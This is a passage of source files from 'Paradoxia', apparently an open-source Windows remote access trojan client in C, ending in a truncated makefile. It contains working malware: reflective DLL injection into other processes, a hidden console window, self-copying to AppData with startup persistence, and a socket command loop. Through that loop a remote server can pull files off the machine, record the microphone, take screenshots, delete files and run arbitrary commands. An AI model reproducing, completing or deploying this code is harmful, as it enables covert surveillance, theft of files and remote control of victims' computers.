PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 184 | // PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ 185 | // Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space. 186 | // Note: This function currently cant inject accross architectures, but only to architectures which are the 187 | // same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64. 188 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ) 189 | { 190 | BOOL bSuccess = FALSE; 191 | LPVOID lpRemoteLibraryBuffer = NULL; 192 | LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL; 193 | HANDLE hThread = NULL; 194 | DWORD dwReflectiveLoaderOffset = 0; 195 | DWORD dwThreadId = 0; 196 | 197 | __try 198 | { 199 | do 200 | { 201 | if( !hProcess || !lpBuffer || !dwLength ) 202 | break; 203 | 204 | // check if the library has a ReflectiveLoader... 205 | dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); 206 | if( !dwReflectiveLoaderOffset ) 207 | break; 208 | 209 | // alloc memory (RWX) in the host process for the image... 210 | lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 211 | if( !lpRemoteLibraryBuffer ) 212 | break; 213 | 214 | // write the image into the host process... 215 | if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) ) 216 | break; 217 | 218 | // add the offset to ReflectiveLoader() to the remote library address... 219 | lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset ); 220 | 221 | // create a remote thread in the host process to call the ReflectiveLoader! 222 | hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId ); 223 | 224 | } while( 0 ); 225 | 226 | } 227 | __except( EXCEPTION_EXECUTE_HANDLER ) 228 | { 229 | hThread = NULL; 230 | } 231 | 232 | return hThread; 233 | } 234 | //===============================================================================================// 235 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/LoadLibraryR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | #ifdef __MINGW32__ 33 | #define __try 34 | #define __except(x) if(0) 35 | #endif 36 | 37 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); 38 | 39 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); 40 | 41 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); 42 | 43 | //===============================================================================================// 44 | #endif 45 | //===============================================================================================// 46 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ParadoxiaClient.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | connect.c (c) 2020 4 | Created: 2020-08-15T15:27:04.427Z 5 | Modified: - 6 | */ 7 | 8 | /* 9 | Have a good time reading the source. You're an amazing person. 10 | If you decide to copy, Don't forget to give me credit. 11 | */ 12 | 13 | 14 | #include "paradoxia.h" 15 | #include "LoadLibraryR.h" 16 | 17 | 18 | char recvbuf[BUFFER]; 19 | 20 | int fsize = 0; 21 | char* fileinfo[3]; 22 | char temp[BUFFER]; // Temporary buffer to receive file information 23 | 24 | struct sockaddr_in server; 25 | SOCKET sockfd; 26 | 27 | TOKEN_PRIVILEGES priv = { 0 }; 28 | HANDLE hModule = NULL; 29 | HANDLE hProcess = NULL; 30 | HANDLE hToken = NULL; 31 | 32 | 33 | #define BREAK_WITH_ERROR( e ) { sockprintf( "[-] %s. Error=%ld", e, GetLastError() ); break; } 34 | 35 | 36 | // By @augustgl (github.com/augustgl) 37 | void sockprintf(const char* words, ...) { 38 | static char textBuffer[BUFFER]; 39 | memset(textBuffer, '\0', BUFFER); 40 | va_list args; 41 | va_start(args, words); 42 | vsprintf(textBuffer, words, args); 43 | va_end(args); 44 | sockSend(textBuffer); 45 | // return send(sock, textBuffer, strlen(textBuffer), 0); // see, it's printf but for a socket. instead of printing, at the end it's a send() 46 | } 47 | 48 | void REConnect(void) 49 | { 50 | closesocket(sockfd); 51 | WSACleanup(); 52 | Sleep(2000); 53 | MainConnect(); 54 | } 55 | 56 | void sockSend(const char* data) 57 | { 58 | int lerror = WSAGetLastError(); 59 | int totalsent = 0; 60 | int buflen = strlen(data); 61 | while (buflen > totalsent) { 62 | int r = send(sockfd, data + totalsent, buflen - totalsent, 0); 63 | if (lerror == WSAECONNRESET) 64 | { 65 | connected = FALSE; 66 | } 67 | if (r < 0) return; 68 | totalsent += r; 69 | } 70 | return; 71 | } 72 | 73 | void paradoxia_main(void) 74 | { 75 | while (connected) 76 | { 77 | Sleep(100); 78 | memset(recvbuf, '\0', BUFFER); 79 | int return_code = recv(sockfd, recvbuf, BUFFER, 0); 80 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 81 | { 82 | connected = FALSE; 83 | } 84 | 85 | if (strcmp(recvbuf, "frecv") == 0) // frecv (file recv) / recv file from server 86 | { 87 | 88 | int expected = 0; // expected bytes of size 89 | DWORD dwBytesWritten = 0; // number of bytes written 90 | BOOL write; // Return value of WriteFile(); 91 | memset(temp, '\0', BUFFER); // Clear temp 92 | memset(fileinfo, '\0', 2); 93 | int return_code = recv(sockfd, temp, BUFFER, 0); // Receive File information from server (filename:filesize) 94 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 95 | { 96 | connected = FALSE; 97 | } 98 | split(temp, fileinfo, ":"); // split the received string with ':' delimeter. So at index 0, There is filename, And at index 1, There is filesize. 99 | expected = atoi(fileinfo[1]); // Convert filesize to integer. Filesize is the expected file size. 100 | // Create file. 101 | HANDLE recvfile = CreateFile(fileinfo[0], FILE_APPEND_DATA, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 102 | if (recvfile == INVALID_HANDLE_VALUE) { 103 | sockprintf( "[Error Creating File] : %ld", GetLastError()); 104 | } 105 | else { 106 | memset(recvbuf, '\0', BUFFER); // Clear main buffer 107 | int total = 0; // Total bytes received 108 | 109 | do { // IF Total is equal to expected bytes. Break the loop, And stop receiving. 110 | fsize = recv(sockfd, recvbuf, BUFFER, 0); // Receive file 111 | if (fsize == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 112 | { 113 | connected = FALSE; 114 | printf("[X] Connection interrupted while receiving file %s for %s size.", fileinfo[0], fileinfo[1]); 115 | } 116 | else if (fsize == 0) { 117 | break; 118 | } 119 | else { 120 | write = WriteFile(recvfile, recvbuf, fsize, &dwBytesWritten, NULL); // Write file data to file 121 | total += fsize; // Add number of bytes received to total. 122 | } 123 | } while (total != expected); 124 | 125 | if (write == FALSE) 126 | { 127 | sockprintf( "[Error Writing file %s of %s size] Error : %ld.", fileinfo[0], fileinfo[1], GetLastError()); 128 | } 129 | else { 130 | // sockprintf( "\n[ Received File : %s ]\n[ File Size : %s bytes ]\n[ Bytes written : %ld ]\n", fileinfo[0], fileinfo[1], dwBytesWritten); 131 | // sockprintf( "\n[ Saved File : %s ]\n[ File Size : %i bytes ]\n", fileinfo[0], total); 132 | sockprintf( 133 | 134 | "F_OK,%s,%i,%s\\%s", 135 | fileinfo[0], 136 | total, 137 | cDir(), 138 | fileinfo[0] 139 | ); 140 | } 141 | CloseHandle(recvfile); 142 | } 143 | } 144 | // Reflective DLL Injection over socket 145 | else if (strcmp(recvbuf, "fdll") == 0) 146 | { 147 | DWORD dwProcessId; 148 | memset(temp, '\0', BUFFER); 149 | int return_code = recv(sockfd, temp, BUFFER, 0); 150 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 151 | { 152 | break; 153 | } 154 | split(temp, fileinfo, ":"); 155 | int expected = atoi(fileinfo[1]); 156 | if (strcmp(fileinfo[2], "None") == 0) { 157 | dwProcessId = GetCurrentProcessId(); 158 | } 159 | else { 160 | dwProcessId = ProcessId(fileinfo[2]); 161 | } 162 | 163 | unsigned char* DLL = HeapAlloc(GetProcessHeap(), 0, expected + 1); 164 | 165 | memset(recvbuf, '\0', BUFFER); 166 | ZeroMemory(DLL, expected + 1); 167 | int total = 0; 168 | 169 | do { 170 | fsize = recv(sockfd, recvbuf, BUFFER, 0); 171 | if (fsize == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 172 | { 173 | connected = FALSE; 174 | // printf("[X] Connection interrupted while receiving DLL\n"); 175 | } 176 | else if (fsize == 0) { 177 | break; 178 | } 179 | else { 180 | memcpy(DLL + total, recvbuf, fsize); 181 | total += fsize; 182 | } 183 | } while (total != expected); 184 | 185 | do { 186 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 187 | { 188 | priv.PrivilegeCount = 1; 189 | priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 190 | 191 | if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid)) 192 | AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL); 193 | 194 | CloseHandle(hToken); 195 | } 196 | 197 | hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId); 198 | if (!hProcess) 199 | BREAK_WITH_ERROR("Failed to open the target process"); 200 | 201 | hModule = LoadRemoteLibraryR(hProcess, DLL, expected + 1, NULL); 202 | if (!hModule) 203 | BREAK_WITH_ERROR("Failed to inject the DLL"); 204 | 205 | WaitForSingleObject(hModule, -1); 206 | sockprintf( "DLL_OK:%ld", dwProcessId); 207 | } while (0); 208 | 209 | if (DLL) 210 | { 211 | HeapFree(GetProcessHeap(), 0, DLL); 212 | 213 | } 214 | if (hProcess) 215 | { 216 | CloseHandle(hProcess); 217 | } 218 | 219 | } 220 | // Upload File to Server 221 | else if (strstr(recvbuf, "fupload") != NULL) 222 | { 223 | memset(fileinfo, '\0', 3); 224 | split(recvbuf, fileinfo, ":"); 225 | 226 | int bytes_read; 227 | BOOL upload = TRUE; 228 | FILE* fs; 229 | 230 | do { 231 | 232 | for (int i = 0; i < 2; i++) { 233 | if (*fileinfo[i] == '\0') 234 | { 235 | sockprintf( "[ Invalid File Download Request ]\n"); 236 | upload = FALSE; 237 | break; 238 | } 239 | } 240 | 241 | // I'm using fopen instead of GetFileSizeEx because this is much easier for me and this works 242 | // IF you'd like to update this, fork and make a pull request, I will happily accept 243 | if (upload) { 244 | if ((fs = fopen(fileinfo[1], "rb")) != NULL) 245 | { 246 | fseek(fs, 0L, SEEK_END); 247 | long filesize = ftell(fs); 248 | fseek(fs, 0, SEEK_SET); 249 | 250 | if (filesize <= 0) { 251 | sockprintf( "File '%s' is of 0 bytes.", fileinfo[1]); 252 | fclose(fs); 253 | upload = FALSE; 254 | break; 255 | } 256 | 257 | sockprintf( "FILE:%s:%ld", fileinfo[1], filesize); 258 | Sleep(1000); 259 | char fbuffer[500]; 260 | memset(fbuffer, '\0', 500); 261 | while (!feof(fs)) { 262 | if ((bytes_read = fread(&fbuffer, 1, 500, fs)) > 0) { 263 | send(sockfd, fbuffer, bytes_read, 0); 264 | } 265 | else { 266 | upload = FALSE; 267 | break; 268 | } 269 | } 270 | fclose(fs); 271 | } 272 | 273 | else { 274 | sockprintf( "[ Error Opening file %s (Error %ld) ]", fileinfo[1], GetLastError()); 275 | } 276 | } 277 | // important 278 | upload = FALSE; 279 | 280 | } while (upload); 281 | 282 | } 283 | // ======================================== 284 | else if (strcmp(recvbuf, "micstart") == 0) 285 | { 286 | mciSendString("open new type waveaudio alias paradoxia", NULL, 0, NULL); 287 | mciSendString("set prime time format ms", NULL, 0, NULL); 288 | mciSendString("record paradoxia notify", NULL, 0, NULL); 289 | sockprintf("[+] Now recording microphone."); 290 | } 291 | else if (strstr(recvbuf, "micstop") != NULL) 292 | { 293 | memset(fileinfo, '\0', 3); 294 | split(recvbuf, fileinfo, ":"); 295 | char filename[200]; 296 | memset(filename, '\0', 200); 297 | snprintf(filename, 200, "save paradoxia %s", fileinfo[1]); 298 | mciSendString("stop paradoxia", NULL, 0, NULL); 299 | mciSendString(filename, NULL, 0, NULL); 300 | mciSendString("close paradoxia", NULL, 0, NULL); 301 | } 302 | 303 | // send user / pc 304 | else if (strcmp(recvbuf, "host") == 0) 305 | { 306 | UserPC(); 307 | } 308 | 309 | else if (strcmp(recvbuf, "os") == 0) { 310 | OS(); 311 | } 312 | else if (strcmp(recvbuf, "processors") == 0) { 313 | SYSTEMINFO(0); 314 | } 315 | else if (strcmp(recvbuf, "pagesize") == 0) { 316 | SYSTEMINFO(1); 317 | } 318 | else if (strcmp(recvbuf, "minappaddr") == 0) { 319 | SYSTEMINFO(2); 320 | } 321 | else if (strcmp(recvbuf, "maxappaddr") == 0) { 322 | SYSTEMINFO(3); 323 | } 324 | 325 | else if (strcmp(recvbuf, "agent") == 0) { 326 | sockprintf( "%s", ParadoxiaInfo()); 327 | } 328 | 329 | else if (strcmp(recvbuf, "ramsize") == 0){ 330 | ramsize(1); 331 | } 332 | 333 | else if (strcmp(recvbuf, "vramsize") == 0) { 334 | ramsize(0); 335 | } 336 | // list files in current directory 337 | else if (strcmp(recvbuf, "listdir") == 0) 338 | { 339 | WIN32_FIND_DATA data; 340 | HANDLE hFind; 341 | hFind = FindFirstFile("*", &data); 342 | int i = 0; 343 | char dir[BUFFER]; 344 | if (hFind != INVALID_HANDLE_VALUE) 345 | { 346 | memset(dir, 0, BUFFER); 347 | snprintf(dir, BUFFER, "Listing '%s'\n-------------------\n", cDir()); 348 | do { 349 | int len = strlen(dir); 350 | if (data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { 351 | snprintf(dir + len, sizeof(dir) - len, "[DIRECTORY] %s\n", data.cFileName); 352 | } 353 | else { 354 | ULONGLONG FileSize = data.nFileSizeHigh; 355 | FileSize <<= sizeof(data.nFileSizeHigh) * 8; 356 | FileSize |= data.nFileSizeLow; 357 | snprintf(dir + len, sizeof(dir) - len, "[FILE] %s (%llu bytes)\n", data.cFileName, FileSize); 358 | } 359 | } while (FindNextFile(hFind, &data)); 360 | 361 | sockSend(dir); 362 | } 363 | } 364 | 365 | // change directory 366 | else if (strcmp(recvbuf, "cd") == 0) 367 | { 368 | memset(recvbuf, '\0', BUFFER); 369 | int return_code = recv(sockfd, recvbuf, BUFFER, 0); 370 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 371 | { 372 | connected = FALSE; 373 | } 374 | 375 | if (!SetCurrentDirectory(recvbuf)) 376 | { 377 | int x = GetLastError(); // Should this be integer? 378 | // on line 22 I'm using %ld to print the error, it works, What?? 379 | switch (x) { 380 | case 2: 381 | sockprintf( "Error Changing Directory, File or Folder not Found (Error code %i)", x); 382 | break; 383 | case 3: 384 | sockprintf( "Error Changing Directory, Path not found (Error Code %i)", x); 385 | break; 386 | case 5: 387 | sockprintf( "Error Changing Directory, Access Denied (Error Code %i)", x); 388 | break; 389 | default: 390 | sockprintf( "Error Changing Directory, Error %i", x); 391 | break; 392 | } 393 | } 394 | else { 395 | sockprintf( "Directory Changed to '%s'", cDir()); 396 | } 397 | } 398 | 399 | // delete file 400 | else if (strstr(recvbuf, "delete") != NULL) 401 | { 402 | memset(fileinfo, '\0', 3); 403 | split(recvbuf, fileinfo, ":"); 404 | if (isFile(fileinfo[1])) 405 | { 406 | if (DeleteFile(fileinfo[1])) 407 | { 408 | sockprintf( "DEL_OK,%s,%s", fileinfo[1], cDir()); 409 | } 410 | else { 411 | sockprintf( "Error Deleting file : %i", GetLastError()); 412 | } 413 | 414 | } 415 | else { 416 | sockprintf( "File '%s' does not exist.", fileinfo[1]); 417 | } 418 | } 419 | 420 | // kill 421 | else if (strcmp(recvbuf, "kill") == 0) 422 | { 423 | connected = FALSE; 424 | break; 425 | } 426 | 427 | else if(strcmp(recvbuf, "die") == 0) 428 | { 429 | sockprintf("Dying until next reboot.\n"); 430 | connected = FALSE; 431 | Sleep(2000); 432 | exit(0); // :D 433 | } 434 | 435 | // Capture screenshot 436 | else if (strcmp(recvbuf, "screenshot") == 0) { 437 | CaptureAnImage(GetDesktopWindow(), sockfd); 438 | } 439 | 440 | // Send process info 441 | else if (strstr(recvbuf, "psinfo") != NULL) 442 | { 443 | memset(fileinfo, '\0', 3); 444 | split(recvbuf, fileinfo, ":"); 445 | char FILEPATH[BUFFER]; 446 | memset(FILEPATH, '\0', BUFFER); 447 | DWORD pid = ProcessId(fileinfo[1]); 448 | HANDLE procHandle; 449 | if (pid != 0) 450 | { 451 | procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); 452 | if (procHandle != NULL) { 453 | if (GetModuleFileNameEx(procHandle, NULL, FILEPATH, MAX_PATH) != 0) 454 | { 455 | // Send Process name, pid, and path back 456 | sockprintf( "PROCESS,%s,%ld,%s", fileinfo[1], pid, FILEPATH); 457 | } 458 | else { 459 | sockprintf( "PROCESS,%s,%ld,(error : %ld)", fileinfo[1], pid, GetLastError()); 460 | } 461 | CloseHandle(procHandle); 462 | } 463 | else { 464 | sockprintf( "Failed to open Process : %s", fileinfo[1]); 465 | } 466 | } 467 | else { 468 | sockprintf( "Process not running."); 469 | } 470 | } 471 | 472 | // Send admin status 473 | 474 | else if (strcmp(recvbuf, "isadmin") == 0) 475 | { 476 | if (IsAdmin()) 477 | { 478 | sockprintf( "ADMIN:TRUE"); 479 | } 480 | else { 481 | sockprintf( "ADMIN:FALSE"); 482 | } 483 | 484 | } 485 | 486 | // Send WAN IP Address, last command 487 | 488 | else if (strcmp(recvbuf, "wanip") == 0) 489 | { 490 | char* wanip[BUFFER]; 491 | HINTERNET hInternet, hFile; 492 | DWORD rSize; 493 | if (InternetCheckConnection("http://www.google.com", 1, 0)) { 494 | memset(wanip, '\0', BUFFER); 495 | hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 496 | hFile = InternetOpenUrl(hInternet, "https://myexternalip.com/raw", NULL, 0, INTERNET_FLAG_RELOAD, 0); // bot.whatsmyipaddress is down now. 497 | // F 498 | InternetReadFile(hFile, &wanip, sizeof(wanip), &rSize); 499 | wanip[rSize] = '\0'; 500 | 501 | InternetCloseHandle(hFile); 502 | InternetCloseHandle(hInternet); 503 | sockprintf( "WANIP:%s", wanip); 504 | } 505 | else { 506 | sockprintf( "No Internet Connection detected."); 507 | } 508 | } 509 | 510 | else if (strcmp(recvbuf, "paradoxiapid") == 0) { 511 | sockprintf( "paradoxiaPID:%s", ParadoxiaInfo()); 512 | } 513 | 514 | 515 | else { 516 | ExecSock(sockfd, recvbuf); 517 | } 518 | 519 | } 520 | 521 | if (!connected) 522 | { 523 | REConnect(); 524 | } 525 | } 526 | 527 | void StartWSA(void) 528 | { 529 | WSADATA wsa; 530 | if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) 531 | { 532 | printf("[Error] Error Starting Winsock."); 533 | WSAReportError(); 534 | } 535 | } 536 | 537 | 538 | void MainConnect(void) 539 | { 540 | StartWSA(); 541 | sockfd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); 542 | if (sockfd == SOCKET_ERROR || sockfd == INVALID_SOCKET) 543 | { 544 | printf("Socket Creation Error. "); 545 | 546 | WSAReportError(); 547 | exit(1); 548 | } 549 | 550 | server.sin_addr.s_addr = inet_addr("{{serverhost}}"); 551 | server.sin_port = htons({{serverport}}); 552 | server.sin_family = AF_INET; 553 | 554 | do { 555 | if (connect(sockfd, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) { 556 | REConnect(); 557 | } 558 | else { 559 | connected = TRUE; 560 | } 561 | } while (!connected); 562 | 563 | paradoxia_main(); 564 | } 565 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ParadoxiaClient.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 16.0 37 | Win32Proj 38 | {bc18ae1e-dddd-4039-9eec-91b2d35af740} 39 | ParadoxiaClient 40 | 10.0 41 | 42 | 43 | 44 | Application 45 | true 46 | v142 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v142 53 | true 54 | Unicode 55 | 56 | 57 | Application 58 | true 59 | v142 60 | Unicode 61 | 62 | 63 | Application 64 | false 65 | v142 66 | true 67 | Unicode 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | true 89 | 90 | 91 | false 92 | 93 | 94 | true 95 | 96 | 97 | false 98 | 99 | 100 | 101 | Level3 102 | true 103 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | true 115 | true 116 | true 117 | _CRT_SECURE_NO_WARNINGS;_WINSOCK_DEPRECATED_NO_WARNINGS 118 | true 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | true 131 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | 138 | 139 | 140 | 141 | Level3 142 | true 143 | true 144 | true 145 | _CRT_SECURE_NO_WARNINGS;_WINSOCK_DEPRECATED_NO_WARNINGS 146 | true 147 | 148 | 149 | Console 150 | true 151 | true 152 | true 153 | 154 | 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ParadoxiaClient.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/icon.rc: -------------------------------------------------------------------------------- 1 | id ICON "{{iconhere}}" -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | main.c (c) 2020 4 | 5 | Created: 2020-08-15T15:27:04.427Z 6 | Modified: - 7 | */ 8 | /* 9 | Have a good time reading the source. You're an amazing person. 10 | If you decide to copy, Don't forget to give me credit. 11 | */ 12 | #include "paradoxia.h" 13 | int main() // entry point 14 | { 15 | // O_o 16 | ShowWindow(GetConsoleWindow(), SW_HIDE); 17 | char installPath[BUFFER]; 18 | char installDir[BUFFER]; 19 | memset(installPath,'\0', BUFFER); 20 | snprintf(installPath, BUFFER, "%s\\%s\\%s", appDataPath(), INSTALL_FOLDER_NAME, INSTALL_NAME); 21 | memset(installDir,'\0', BUFFER); 22 | snprintf(installDir, BUFFER, "%s\\%s\\", appDataPath(), INSTALL_FOLDER_NAME); 23 | CreateDirectory (installDir, NULL); 24 | CopyFile(ParadoxiaInfo(), installPath, TRUE); 25 | StartupKey(installPath); 26 | MainConnect(); 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/makefile: -------------------------------------------------------------------------------- 1 | COMPILER := 2 | ifeq ($(OS),Windows_NT) 3 | COMPILER += gcc 4 | else 5 | COMPILER += i686-w64-mingw32-gcc 6 | endif 7 | 8 | WINDRES := 9 | ifeq ($(OS),Windows_NT) 10 | WINDRES += windres 11 | else 12 | WINDRES += i686-w64-mingw32-windres 13 | endif 14 | 15 | 16 | OUTFILE := {{outfilehere}} 17 | 18 | main: 19 | $(COMPILER) main.c 